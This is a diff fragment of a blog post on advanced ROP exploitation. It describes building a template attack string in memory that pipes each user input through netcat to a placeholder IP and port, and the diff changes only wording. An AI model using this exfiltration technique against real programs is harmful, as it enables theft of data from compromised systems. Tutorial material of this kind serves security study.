execas/execas.github.io/_posts/2020-01-12-advanced-rop2.md

 A template attack string is written to 0x401000.
 This will be used to generate a "fresh" attack string each time `scanf()` is called by `chat()`

 ```
-'echo                          | nc <IP> <PORT>' string to 0x401480
+'echo                          | nc <IP> <PORT>'
 ```

 The space is where the user input will go.
-Spaces are ignored by the shell, so we only have to make enough room for the maximum input length.
+Extra space characters are ignored by the shell, so we only have to make enough room for the maximum input length.

 We find the bytes we need in memory, and use `bncpy()` to write them all to memory.